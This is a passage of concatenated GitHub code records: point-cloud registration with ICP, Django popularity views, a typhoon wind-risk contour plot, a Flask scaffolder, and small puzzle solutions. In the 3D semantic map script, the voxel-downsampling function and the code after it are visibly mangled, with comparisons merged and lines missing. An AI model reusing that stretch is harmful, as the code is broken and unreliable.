\"population\",\n \"Area_Code\": \"area_code\"\n }\n pop.rename(columns=colname_mapping, inplace=True)\n pop[[\"area_code\", \"population\"]].to_csv(sys.argv[-1], index=False)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hamishgibbs/facebook_population_2020_2021","sub_path":"src/census_population/clean_ni_mye.py","file_name":"clean_ni_mye.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23712434594","text":"import argparse\nimport os\nfrom t4c.util.file_checks import DATA_DIR\n\"\"\"Parse command line options\"\"\"\n\n\ndef parse_cli():\n \"\"\"Parse command line options\"\"\"\n\n parser = argparse.ArgumentParser(description=\"Hotel Data Conversion: It converts and\"\n \" validate data from CSV file to JSON\"\n \"\\n\\n-> Default Input file: .data/hotels.csv\"\n \"\\n-> Default Output Json: .data/hotels.json\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"-s\", \"--source-file\", required=False,\n default=os.path.join(os.getcwd(), DATA_DIR, \"hotels.csv\"))\n\n parser.add_argument(\"-d\", \"--destination-file\", required=False,\n default=os.path.join(os.getcwd(), DATA_DIR, 'hotels.json'))\n\n parser.add_argument(\"--overwrite-destination-file\", required=False,\n default=True, choices=['True', 'False'])\n\n parser.add_argument(\"--sort-by-field\", required=False, default='None',\n help='The field in INPUT file that '\n 'you want to use to sort the OUTPUT file')\n\n parser.add_argument(\"--complex-url-validation\", required=False,\n default=False, choices=['True', 'False'],\n help='Default = False - '\n 'It uses additional logic to evaluate the URL passed\\n'\n 'WARNING - It slows down drastically script performance')\n\n return parser.parse_args()\n","repo_name":"zimaldone/t4c","sub_path":"t4c/util/args_parser.py","file_name":"args_parser.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1726147386","text":"\"\"\"\nUsage: \npython 3d_semantic_map.py --test_scene=Data_collection/first_floor --floor=1\n\npython 3d_semantic_map.py --test_scene=Data_collection/second_floor --floor=2\n\"\"\"\nimport numpy as np\nimport cv2\nimport argparse\nimport os\nimport open3d as o3d\nfrom PIL import Image\nimport time\nimport copy\nimport pandas as pd\nimport math\nfrom sklearn.neighbors import NearestNeighbors\nimport gc\n\ndef parse_config():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--test_scene\", default=\"first_floor\")\n parser.add_argument(\"--floor\", required=True)\n parser.add_argument(\"--use_open3d\", default=1)\n # parser.add_argument(\"--gt\", required=True)\n \n return parser.parse_args()\n\ndef draw_registration_result(source, target, transformation, paint_uniform_color=True):\n source_temp = copy.deepcopy(source)\n target_temp = copy.deepcopy(target)\n if paint_uniform_color:\n source_temp.paint_uniform_color([1, 0.706, 0])\n target_temp.paint_uniform_color([0, 0.651, 0.929])\n source_temp.transform(transformation)\n o3d.visualization.draw_geometries([source_temp, target_temp])\n\ndef preprocess_point_cloud(pcd, voxel_size):\n # print(\":: Downsample with a voxel size %.3f.\" % voxel_size)\n pcd_down = pcd.voxel_down_sample(voxel_size)\n\n radius_normal = voxel_size * 2\n # print(\":: Estimate normal with search radius %.3f.\" % radius_normal)\n pcd_down.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))\n\n radius_feature = voxel_size * 5\n # print(\":: Compute FPFH feature with search radius %.3f.\" % radius_feature)\n pcd_fpfh = o3d.pipelines.registration.compute_fpfh_feature(\n pcd_down,\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))\n return pcd_down, pcd_fpfh\n\ndef prepare_dataset(source, target, voxel_size):\n source_down, source_fpfh = preprocess_point_cloud(source, voxel_size)\n target_down, target_fpfh = preprocess_point_cloud(target, voxel_size)\n return source, target, source_down, target_down, source_fpfh, target_fpfh\n\ndef execute_global_registration(source_down, target_down, source_fpfh,\n target_fpfh, voxel_size):\n distance_threshold = voxel_size * 1.5\n # print(\":: RANSAC registration on downsampled point clouds.\")\n # print(\" Since the downsampling voxel size is %.3f,\" % voxel_size)\n # print(\" we use a liberal distance threshold %.3f.\" % distance_threshold)\n result = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n source_down, target_down, source_fpfh, target_fpfh, True,\n distance_threshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False),\n 3, [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(\n 0.9),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(\n distance_threshold)\n ], o3d.pipelines.registration.RANSACConvergenceCriteria(100000, 0.999))\n return result\n\ndef execute_fast_global_registration(source_down, target_down, source_fpfh,\n target_fpfh, voxel_size):\n distance_threshold = voxel_size * 0.5\n # print(\":: Apply fast global registration with distance threshold %.3f\" \\\n # % distance_threshold)\n result = o3d.pipelines.registration.registration_fast_based_on_feature_matching(\n source_down, target_down, source_fpfh, target_fpfh,\n o3d.pipelines.registration.FastGlobalRegistrationOption(\n maximum_correspondence_distance=distance_threshold))\n return result\n\ndef depth_image_to_point_cloud(rgb_img, depth_img, intrinsic_mtx):\n rgb = cv2.imread(rgb_img)[:,:,[2,1,0]].reshape((-1,3))\n depth = cv2.imread(depth_img, 0)\n depth_scale = 1000.0\n fx, fy, cx, cy = intrinsic_mtx[0,0], intrinsic_mtx[1,1], intrinsic_mtx[0,2], intrinsic_mtx[1,2]\n\n x = np.zeros(depth.shape)\n y = np.zeros(depth.shape)\n z = depth / depth_scale\n for i in range(x.shape[1]):\n x[:,i] = i\n x = ((x - x.shape[1] / 2) * z) / fx\n for i in range(y.shape[0]):\n y[i,:] = i\n y = ((y - y.shape[0] / 2) * z) / fy\n \n x, y, z = x.reshape((-1,1)), y.reshape((-1,1)), z.reshape((-1,1))\n r, g, b = rgb[:,0].reshape((-1,1)), rgb[:,1].reshape((-1,1)), rgb[:,2].reshape((-1,1))\n points = np.concatenate((x, -y, -z), axis=1)\n colors = np.concatenate((r, g, b), axis=1) / 255.0\n \n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(points)\n pcd.colors = o3d.utility.Vector3dVector(colors)\n return pcd\n\ndef local_icp_algorithm(pcd1, pcd2, trans_init, threshold):\n # print(\"Apply point-to-point ICP\")\n reg_p2p = o3d.pipelines.registration.registration_icp(\n pcd1, pcd2, threshold, trans_init,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(),\n o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration=100))\n # draw_registration_result(pcd1, pcd2, reg_p2p.transformation, paint_uniform_color=False)\n return reg_p2p.transformation\n\ndef best_fit_transform(source, target):\n '''\n Calculates the least-squares best-fit transform that maps corresponding points A to B in m spatial dimensions\n Input:\n A: Nxm numpy array of corresponding points\n B: Nxm numpy array of corresponding points\n Returns:\n T: (m+1)x(m+1) homogeneous transformation matrix that maps A on to B\n R: mxm rotation matrix\n t: mx1 translation vector\n '''\n\n assert source.shape == target.shape\n\n # get number of dimensions\n m = source.shape[1]\n\n # translate points to their centroids\n centroid_source = np.mean(source, axis=0)\n centroid_target = np.mean(target, axis=0)\n Source = source - centroid_source\n Target = target - centroid_target\n # print(Source.shape)\n\n # rotation matrix\n W = Target.T @ Source # mxN @ Nxm\n U, S, Vt = np.linalg.svd(W)\n R = U @ Vt\n # print(R.shape)\n\n # special reflection case\n if np.linalg.det(R) < 0:\n Vt[m-1,:] *= -1\n R = U @ Vt\n\n # translation\n t = centroid_target.T - R @ centroid_source.T\n\n # homogeneous transformation\n T = np.identity(m+1)\n T[:m, :m] = R\n T[:m, m] = t\n\n return T\n\ndef local_icp_algorithm_own(pcd1, pcd2, trans_init, threshold):\n # pass\n max_iterations = 100\n source = copy.deepcopy(pcd1)\n target = copy.deepcopy(pcd2)\n \n source = np.asarray(source.points)\n target = np.asarray(target.points)\n\n m = source.shape[1]\n\n source_temp = np.ones((m+1, source.shape[0]))\n target_temp = np.ones((m+1, target.shape[0]))\n \n source_temp[:m,:] = np.copy(source.T)\n target_temp[:m,:] = np.copy(target.T)\n \n source_temp = trans_init @ source_temp\n\n prev_error = 0\n \n for i in range(max_iterations):\n # find the nearest neighbours between the current source and destination points\n neigh = NearestNeighbors(n_neighbors=1, radius=threshold, algorithm='auto')\n neigh.fit(target_temp[:m,:].T)\n distances, indices = neigh.kneighbors(source_temp[:m,:].T)\n indices = indices.reshape(-1)\n distances = distances.reshape(-1)\n valid = distances < threshold\n source_temp = source_temp[:,valid]\n target_temp = target_temp[:,indices]\n target_temp = target_temp[:,valid]\n source = source[valid,:]\n # compute the transformation between the current source and nearest destination points\n T = best_fit_transform(source_temp[:m,:].T, target_temp[:m,:].T)\n\n # update the current source\n source_temp = T @ source_temp\n\n # check error\n mean_error = np.sum(distances) / distances.size\n # print(mean_error)\n if abs(prev_error - mean_error) < 0.0001:\n break\n prev_error = mean_error\n\n # calculcate final tranformation\n T = best_fit_transform(source, source_temp[:m,:].T)\n\n return T\n\ndef calculate_error_distance(line1, line2):\n p1, p2 = np.asarray(line1.points), np.asarray(line2.points)\n error_dst = ((p1[:,0] - p2[:,0])**2 + (p1[:,1] - p2[:,1])**2 + (p1[:,2] - p2[:,2])**2)**0.5\n return np.sum(error_dst)\n \ndef euler_from_quaternion(w, x, y, z):\n \"\"\"\n Convert a quaternion into euler angles (roll, pitch, yaw)\n roll is rotation around x in radians (counterclockwise)\n pitch is rotation around y in radians (counterclockwise)\n yaw is rotation around z in radians (counterclockwise)\n \"\"\"\n t0 = +2.0 * (w * x + y * z)\n t1 = +1.0 - 2.0 * (x * x + y * y)\n roll_x = math.atan2(t0, t1)\n \n t2 = +2.0 * (w * y - z * x)\n t2 = +1.0 if t2 > +1.0 else t2\n t2 = -1.0 if t2 < -1.0 else t2\n pitch_y = math.asin(t2)\n \n t3 = +2.0 * (w * z + x * y)\n t4 = +1.0 - 2.0 * (y * y + z * z)\n yaw_z = math.atan2(t3, t4)\n rz = np.array([[math.cos(yaw_z), -math.sin(yaw_z), 0.0],\n [math.sin(yaw_z), math.cos(yaw_z), 0.0],\n [0.0, 0.0, 1.0]])\n ry = np.array([[math.cos(pitch_y), 0.0, math.sin(pitch_y)],\n [0.0, 1.0, 0.0],\n [-math.sin(pitch_y), 0.0, math.cos(pitch_y)]])\n rx = np.array([[1.0, 0.0, 0.0],\n [0.0, math.cos(roll_x), -math.sin(roll_x)],\n [0.0, math.sin(roll_x), math.cos(roll_x)]])\n \n R = rz @ (ry @ rx)\n return R # in radians\n\n\ndef custom_voxel_down(pcd, voxel_size):\n points = np.asarray(pcd.points)\n colors = np.asarray(pcd.colors)\n min_bound = pcd.get_min_bound()\n max_bound = pcd.get_max_bound()\n points_mean_list = []\n colors_mode_list = []\n range_x = np.arange(min_bound[0].item(), max_bound[0].item()+voxel_size, voxel_size)\n range_y = np.arange(min_bound[1].item(), max_bound[1].item()+voxel_size, voxel_size)\n range_z = np.arange(min_bound[2].item(), max_bound[2].item()+voxel_size, voxel_size)\n x, y, z = points[:,0].reshape((-1,1)), points[:,1].reshape((-1,1)), points[:,2].reshape((-1,1))\n # valid_x = [((x >= i) & (x < i+voxel_size)).reshape(-1) for i in range_x]\n valid_x = [np.logical_and(x>=i, x= j) & (y < j+voxel_size)).reshape(-1) for j in range_y]\n valid_y = [np.logical_and(y>=j, y= k) & (z < k+voxel_size)).reshape(-1) for k in range_z]\n valid_z = [np.logical_and(z>=k, z{num_pcd-i-1}:')\n source = pcd_list[i]\n target = pcd_list[i+1]\n source, target, source_down, target_down, source_fpfh, target_fpfh = \\\n prepare_dataset(source, target, voxel_size)\n start = time.time()\n result_ransac = execute_global_registration(source_down, target_down,\n source_fpfh, target_fpfh,\n voxel_size)\n # print(\"Global registration took %.3f sec.\\n\" % (time.time() - start))\n # print(result_ransac.transformation)\n # draw_registration_result(source_down, target_down, result_ransac.transformation) \n if use_open3d:\n transformation = local_icp_algorithm(source_down, target_down, result_ransac.transformation, threshold)\n else:\n transformation = local_icp_algorithm_own(source_down, target_down, result_ransac.transformation, threshold)\n # draw_registration_result(source, target, transformation, paint_uniform_color=False)\n # print(result_ransac.transformation)\n trans_mtx_list.append(transformation)\n \n \n for i in range(len(trans_mtx_list)-2, -1, -1):\n trans_mtx_list[i] = trans_mtx_list[i+1] @ trans_mtx_list[i]\n \n for i in range(len(trans_mtx_list)):\n pcd_list[i].transform(trans_mtx_list[i])\n\n\n roof_threshold = 0.01 if args.floor == 1 else 0.001 \n for i in range(num_pcd):\n points = np.asarray(pcd_list[i].points)\n colors = np.asarray(pcd_list[i].colors)\n x, y, z = points[:,0].reshape((-1,1)), points[:,1].reshape((-1,1)), points[:,2].reshape((-1,1))\n r, g, b = colors[:,0].reshape((-1,1)), colors[:,1].reshape((-1,1)), colors[:,2].reshape((-1,1))\n # print(np.max(y))\n # y < 0.01 for 1st floor, y < 0.001 for 2nd floor \n valid = (y < roof_threshold).reshape(-1)\n x, y, z = x[valid], y[valid], z[valid]\n r, g, b = r[valid], g[valid], b[valid]\n points = np.concatenate((x,y,z), axis=1)\n colors = np.concatenate((r,g,b), axis=1)\n pcd_list[i].points = o3d.utility.Vector3dVector(points)\n pcd_list[i].colors = o3d.utility.Vector3dVector(colors)\n\n # pcd_total = o3d.geometry.PointCloud()\n for i in range(num_pcd):\n print(i)\n # pcd_total += pcd_list[i]\n pcd_list[i] = custom_voxel_down(pcd_list[i], 0.003)\n # pcd_total = custom_voxel_down(pcd_total, 0.002)\n # pcd_list.append(line_estimated)\n # pcd_list.append(line_gt)\n o3d.visualization.draw_geometries(pcd_list)\n # o3d.io.write_point_cloud(args.test_scene+'.pcd', sum(pcd_list))\n del pcd_list\n gc.collect()\n\n rgb_path = os.path.join(args.test_scene, 'other_pred')\n pcd_list = []\n for i in range(num_files,0,-1):\n pcd = depth_image_to_point_cloud(os.path.join(rgb_path, str(i)+'.png'),\n os.path.join(depth_path, str(i)+'.png'),\n intrinsic_mtx)\n pcd_list.append(pcd)\n\n for i in range(len(trans_mtx_list)):\n pcd_list[i].transform(trans_mtx_list[i])\n\n for i in range(num_pcd):\n points = np.asarray(pcd_list[i].points)\n colors = np.asarray(pcd_list[i].colors)\n x, y, z = points[:,0].reshape((-1,1)), points[:,1].reshape((-1,1)), points[:,2].reshape((-1,1))\n r, g, b = colors[:,0].reshape((-1,1)), colors[:,1].reshape((-1,1)), colors[:,2].reshape((-1,1))\n # print(np.max(y))\n # y < 0.01 for 1st floor, y < 0.001 for 2nd floor \n valid = (y < roof_threshold).reshape(-1)\n x, y, z = x[valid], y[valid], z[valid]\n r, g, b = r[valid], g[valid], b[valid]\n points = np.concatenate((x,y,z), axis=1)\n colors = np.concatenate((r,g,b), axis=1)\n pcd_list[i].points = o3d.utility.Vector3dVector(points)\n pcd_list[i].colors = o3d.utility.Vector3dVector(colors)\n for i in range(num_pcd):\n print(i)\n pcd_list[i] = custom_voxel_down(pcd_list[i], 0.003)\n o3d.visualization.draw_geometries(pcd_list)\n del pcd_list\n gc.collect()","repo_name":"gyes00205/NYCU_IS","sub_path":"HW2/3d_semantic_map.py","file_name":"3d_semantic_map.py","file_ext":"py","file_size_in_byte":16419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15973210526","text":"# 这道题是最简单的斐波那契数列\nclass Solution:\n def fib(self, n: int):\n if n == 0:\n return 0\n if n == 1:\n return 1\n p, q, s = 0, 1, 1\n for i in range(2, n+1):\n s = p + q\n p = q\n q = s\n return s\n\n\nres = Solution().fib(10)\nprint(res)","repo_name":"royal-dargon/Leetcode","sub_path":"py/dp/509.py","file_name":"509.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27791830347","text":"# Create your views here.\nfrom django.views.decorators.cache import cache_page\nfrom django.template import Context, loader\n\nfrom django.utils import simplejson\nfrom django.db import connection, transaction\nfrom django.http import Http404\n\nfrom collections import defaultdict\nimport json\nfrom datetime import datetime, date, timedelta\n\nfrom Apps.popCommon.database import popCommonDB\nfrom Apps.xrdPopularity.database import popDB\n\nimport logging\nimport time\nimport calendar\nimport string\n\nimport copy\n\nlogger = logging.getLogger(__name__)\n#---------------------------------------------------------------------\n# DATA COLLECTION VIEWS\n#---------------------------------------------------------------------\n\ndef getxrdMonitoringInTimeWindowJSON(pars):\n data = popDB.xrdStatInTimeWindow(pars)\n logger.info('got data')\n jdata = json.dumps(data)\n return jdata\n\n\ndef getxrdMonitoringInTimeWindowForMultiplePlotsJSON(parList):\n # logger.info('in getxrdMonitoringInTimeWindowForMultiplePlotsJSON')\n \n allData = {'data' : [], \"tstop\": parList[0].TStop, \"tstart\": parList[0].TStart} \n for pars in parList:\n pars.orderby = 'order by xTime'\n data = popDB.xrdStatInTimeWindow(pars) \n points = [ (a['MILLISECONDSSINCEEPOCH'], float(a[pars.yval]) ) for a in data['DATA'] ]\n allData['data'].append({'name': pars.name , 'data':points})\n\n # logger.info(parList)\n # logger.info(allData)\n jdata = json.dumps(allData)\n return jdata\n\n\n#---------------------------------------------------------------------\n\ndef getDSStatInTimeWindowJSON(params):\n data = popDB.DSStatInTimeWindow(params)\n jdata = json.dumps(data)\n return jdata\n \n#---------------------------------------------------------------------\n\ndef getUserStatInTimeWindowJSON(params):\n translationDict = { 'totcpu' : 'TOTCPU', 'naccess' : 'NACC', 'nusers' : 'NUSERS'}\n try:\n params.orderVar = translationDict[params.orderVar]\n except:\n raise Paramvalidationexception('orderby', 'parameter not specified or not matching the options: %s' % traslationDict.keys())\n\n data = popDB.UserStatInTimeWindow(params)\n if not hasattr(params, 'LocalVsGlobal'):\n data['COLLNAME'] = params.collName\n data['TSTART'] = params.TStart\n data['TSTOP'] = params.TStop\n jdata = simplejson.dumps(data)\n return jdata\n\n\n#---------------------------------------------------------------------\n\ndef getMostPopStatDict(pars):\n data = []\n dataP = popDB.DSStatInTimeWindow(pars) \n logger.info(dataP)\n params = copy.deepcopy(pars)\n for entry in dataP['DATA'][:params.FirstN]:\n params.collName = entry['COLLNAME']\n #collData = {\"COLLNAME\" : params.collName}\n #collData.update(popDB.MostPopDSStat(params))\n collData = popDB.MostPopDSStat(params)\n data.append(collData)\n\n # logger.info('getMostPopStatDict data %s' % data)\n return data\n\n\n\n\ndef getTimeEvolutionPlotDataJSON(params):\n\n translationDict = { 'totcpu' : 'TOTCPU', 'naccess' : 'NACC', 'nusers' : 'NUSERS'}\n try:\n params.orderVar = translationDict[params.orderVar]\n except:\n raise Paramvalidationexception('orderby', 'parameter not specified or not matching the options: %s' % traslationDict.keys())\n \n\n data = getMostPopStatDict(params)\n res = {'tstart': params.TStart, 'tstop': params.TStop, 'aggr': params.AggrFlag, 'data': data}\n #logger.info('getTimeEvolutionPlotDataJSON data %s' % res)\n \n return json.dumps(res)\n\n\n\n#---------------------------------------------------------------------\n\n\ndef getSingleElementStat(par, MView):\n\n par.table = MView\n data = popDB.MostPopDSStat(par)\n logger.info(par)\n jsonRes = {}\n listRes = []\n series1 = []\n \"\"\"\n for entry in data['data']:\n millisecondSinceEpoch=1000*calendar.timegm(time.strptime(entry['TDAY'],'%Y/%m/%d'))\n if (par.orderVar == \"totcpu\"):\n series1.append( [ millisecondSinceEpoch, entry['TOTCPU'] ] )\n elif (par.orderVar == \"naccess\"):\n series1.append( [ millisecondSinceEpoch, entry['NACC' ] ] )\n elif (par.orderVar == \"nusers\"):\n series1.append( [ millisecondSinceEpoch, entry['NUSERS' ] ] )\n \"\"\"\n #listRes.append({'name' : data['COLLNAME'], 'data' : series1})\n #jsonRes = {'tstart': par.TStart, 'tstop': par.TStop, 'aggr': par.AggrFlag, 'data': listRes}\n jsonRes = {'tstart': par.TStart, 'tstop': par.TStop, 'aggr': par.AggrFlag, 'data': [data]}\n\n jdata = json.dumps(jsonRes)\n return jdata\n\n","repo_name":"dmwm/DDM","sub_path":"DataPopularity/popdb.web/lib/Apps/xrdPopularity/views/data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29779802221","text":"####################################读取数据集,画出最佳路径,保存为图片########################\n\nimport math, sys\nimport numpy as np\nimport scipy.interpolate as interpolate\nimport matplotlib.pyplot as plt\nimport os\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.misc import imread\nimport matplotlib.cbook as cbook\n \nclass cycdat:\n def __init__(self, vx, vy, wind, pres, data):\n self.x = vx\n self.y = vy\n self.w = wind\n self.p = pres\n self.d = data #此网格中有多少个数据点,因此可以对速度求和并求平均值\n #self.t = temp \n######################可以导入此文件夹的所有的TXT文件###################################\n#f = open('./A/CH1949BST.txt', 'r+')\n # 定义figure\nyear=[]\nmonth=[]\nday=[]\nI=[]\nLAT=[]\nLONG=[]\nPRES=[]\nWND=[]\n\n#x = [0 for i in range(150)] #也可以b = [0]*10 \n#for i in range(150):\n# x[i]=i\n##print (x)\n#\n#y = [0 for i in range(54)] #也可以b = [0]*10 \n#for i in range(54):\n# y[i]=i\n#print (y)\n\n# matrix = [[range(0, 150, 1)] for i in range(56)]\nmatrix=np.full((55,150),0,dtype=int)\n#print(matrix)\n\n\nfor filename in os.listdir(\"C:/Users/whuxu/Desktop/code/A\"): \n# print(\"C:/Users/whuxu/Desktop/code/A/\" + filename)\n with open(\"C:/Users/whuxu/Desktop/code/A/\"+filename) as f:\n\n# plt.figure() \n k = f.read() \n lines = k.split('\\n') #用空格键进行分割\n for l in lines:\n lastyear = None\n sp = l.split(' ') #用空格进行分割,分成不同的数组元素\n sp = [y for y in sp if y != ''] \n try:\n if ((sp[1] == '0')or(sp[1] == '1')or(sp[1] == '2')or(sp[1] == '3')or(sp[1] == '4')or(sp[1] == '5')or(sp[1] == '6')or(sp[1] == '9')): \n #date\n # print(l)\n t1 = sp[0]\n year1 = t1[:4] \n month1 = int(t1[5:6]) \n day1 = t1[7:8]\n lat1 = int(sp[2])/10 \n LAT1=int(lat1)\n lon1 = int(sp[3])/10\n LON1 = int(lon1)\n wind1 = int(sp[5])\n pres1 = int(sp[4])\n #intensity\n if(int(sp[5])>=10.8): \n WND.append(wind1) \n year.append(year1) \n \n day.append(day1) \n month.append(month1)\n I.append(sp[1])\n PRES.append(sp[4])\n LAT.append(lat1)\n LONG.append(lon1) \n print(sp[0])\n# print(LON1)\n# print(LAT1)\n # matrix[LON1][LAT1]=matrix[LON1][LAT1]+int(sp[5])\n matrix[LAT1][LON1]=matrix[LAT1][LON1]+int(sp[5])\n # print(matrix[LAT1][LON1])\n # print(year)\n #热带或外来的\n if sp[1] == '6':\n ex1 = False\n else:\n ex1 = True\n #position\n \n \n if lastyear is not None and lastlon < 180.0 and lastlat < 50.0 and (t1[6:8] == \"00\" or t1[6:8] == \"06\" or t1[6:8] == \"12\" or t1[6:8] == \"18\"):\n dlat = lat1 - lastlat\n dlon = lon1 - lastlon\n dwind = wind1 - lastwind\n dpres = pres1 - lastpres\n \n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].x += dlat\n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].y += dlon\n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].w += dwind\n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].p += dpres\n grid[lastmonth - 1][math.floor(lastlat)][math.floor(lastlon) - 100].d += 1\n \n lastyear = year1\n lastmonth = month1\n lastday = day1\n lastlat = lat1\n lastlon = lon1\n lastwind = wind1\n lastpres = pres1\n if sp[0] == '66666': #reset all of the last things and bypass adding a point between storm end & start positions \n datafile = cbook.get_sample_data('C:/Users/whuxu/Desktop/code/China_map/China.png')\n # img = imread(datafile) \n # plt.plot(LONG,LAT,zorder=0.5)\n # plt.scatter(LONG, LAT, color=color_seq)\n # plt.imshow(img, zorder=0, extent=[70, 150, 0, 55]) \n del LONG[:]\n del LAT[:]\n lastyear = None \n except:\n## plt.show()\n# #STR=str(filename);\n# #plt.savefig('C:/Users/whuxu/Desktop/'+STR+'.png',dpi=500)\n# #plt.savefig('C:/Users/whuxu/Desktop/code/China_PATH/'+STR+'.png',dpi=500)\n# \n# #fig=plt.figure()\n print(\"end of file... probably\")\n## print(matrix)\nprint(matrix)\n#contour(matrix) # 等高线自动选择\nz_list = []\nfor y in range(55):\n for x in range(150):\n z = matrix[y][x]\n z_list.append(z) #获得z的数据\nz = z_list \nx = np.linspace(0,159,150)\ny = np.linspace(0,54,55) \n[X,Y] = np.meshgrid(x,y) #生成X,Y画布,X,Y都是3*3\n#因为z是一维,所以要变成3*3\nz = np.mat(z) \nz = np.array(z)\nz.shape = (55,150)\nprint (len(x))\nprint(z.shape[1])\n#画图(建议一定要查看X,Y,z是不是一一对应了)\nplt.figure(figsize=(10,6))\ndatafile = cbook.get_sample_data('C:/Users/whuxu/Desktop/code/white.png')\nimg = imread(datafile) \nplt.contourf(x,y,z,zorder=0.5)\nplt.contour(x,y,z,zorder=0.5)\nplt.imshow(img, zorder=0, extent=[70, 150, 0, 55]) \nplt.show()\n\n\n","repo_name":"tangrui2018/Mathmodel","sub_path":"code/Riskmap.py","file_name":"Riskmap.py","file_ext":"py","file_size_in_byte":6831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3956878313","text":"import os\n\n\n#arquivo para criar projetos básicos em flask \n\ndef changedir():\n path = input(\"Digite o diretório que deseja criar o projeto: \")\n os.chdir(path)\n\n\ndef makefolders():\n os.mkdir('static')\n os.mkdir('templates')\n\n\ndef create_app():\n app = open(\"app.py\",\"w\")\n line = [\"import os\\n\",\"from flask import Flask,\",\n \"render_template,request,redirect,url_for,jsonify\\n\",\n \"from flask_sqlalchemy import SQLAlchemy\\n\",\n \"import sys\\n\",\"app = Flask(__name__)\\n\",\n \"#create the app config, including the database data\\n\",\n \"#templates folder for html, static for css an js files\\n\",\n \"migrate = Migrate(app, db)\\n\"]\n for lines in line:\n app.write(lines)\n\ndef main():\n changedir()\n makefolders()\n create_app()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tgomes1992/Python-Utilities","sub_path":"os_utilities/flask_structure.py","file_name":"flask_structure.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33587010332","text":"from rC3Dmodules import *\n\nclass rC3D(BasicTrainableClassifier):\n def __init__(self, in_c, num_classes, **kwargs):\n super().__init__(**kwargs)\n self.ls = nn.Sequential(rC3DBlockMP(in_c, 64, True),\n rC3DBlockMP(64, 128, True),\n rC3DBlockMP(128, 256, True),\n rC3DBlock(256, 512),\n rC3DBlock(512, 512))\n self.pool = StackPool(1)\n self.fc = nn.Linear(256,num_classes)\n init_cnn(self)\n def __call__(self, X):\n fm = self.ls(X)\n pfm = self.pool(fm)\n ft = self.fc(torch.flatten(pfm,start_dim=1))\n return ft","repo_name":"domhuh/camASL","sub_path":"models/rC3D.py","file_name":"rC3D.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71390029925","text":"class Solution:\n def freqAlphabets(self, s: str) -> str:\n alp = \"abcdefghijklmnopqrstuvwxyz\"\n res = \"\"\n dict= {}\n for i in range(1,27):\n cur = str(i)\n if i >= 10:\n cur = cur + \"#\"\n dict[cur] = alp[i-1]\n\n i = 0\n while i < (len(s)):\n cur = s[i]\n if i+2 < len(s):\n if s[i+2] ==\"#\":\n cur = cur + s[i+1]+s[i+2]\n i = i + 2\n res = res + dict[cur]\n\n i = i + 1\n\n return res\n\nprint(Solution.freqAlphabets(Solution,\"12345678910#11#12#13#14#15#16#17#18#19#20#21#22#23#24#25#26#\"))\n\n\n\n\n\n","repo_name":"AllanZheng/Leetcode","sub_path":"problems/String/1309. Decrypt String from Alphabet to Integer Mapping/1309. Decrypt String from Alphabet to Integer Mapping.py","file_name":"1309. Decrypt String from Alphabet to Integer Mapping.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74508973603","text":"import sys\nfrom collections import deque\nn=int(input())\nq=deque()\n\nfor i in range(n):\n l=sys.stdin.readline().split()\n\n if l[0]=='push':\n q.append(l[1])\n\n elif l[0]=='pop':\n if len(q)!=0:\n print(q.popleft())\n else :\n print(-1)\n elif l[0]=='size':\n print(len(q))\n elif l[0] =='empty':\n if len(q)==0:\n print(1) \n else: print(0)\n elif l[0] =='front':\n if len(q)!=0:\n print(q[0])\n else : #0이면\n print(-1)\n else:\n if len(q)!=0 :\n print(q[-1]) \n else: \n print(-1)","repo_name":"young0264/hellopycharm","sub_path":"백준/18258.큐2.py","file_name":"18258.큐2.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31593962433","text":"from neutron import service\nfrom neutron_lib.api.definitions import availability_zone as az_def\nfrom neutron_lib.api.definitions import external_net as extnet_def\nfrom neutron_lib.callbacks import events\nfrom neutron_lib.callbacks import registry\nfrom neutron_lib import constants as n_const\nfrom neutron_lib import exceptions as n_exc\nfrom neutron_lib.plugins import directory\nfrom neutron_lib.plugins.ml2 import api\nfrom neutron_lib.api.definitions import portbindings\nfrom neutron_lib import rpc as n_rpc\nfrom oslo_log import log as logging\nfrom oslo_log import helpers as log_helpers\n\nfrom networking_aci._i18n import _LI, _LW\nfrom networking_aci.extensions.acioperations import Acioperations # noqa, import enables extension\nfrom 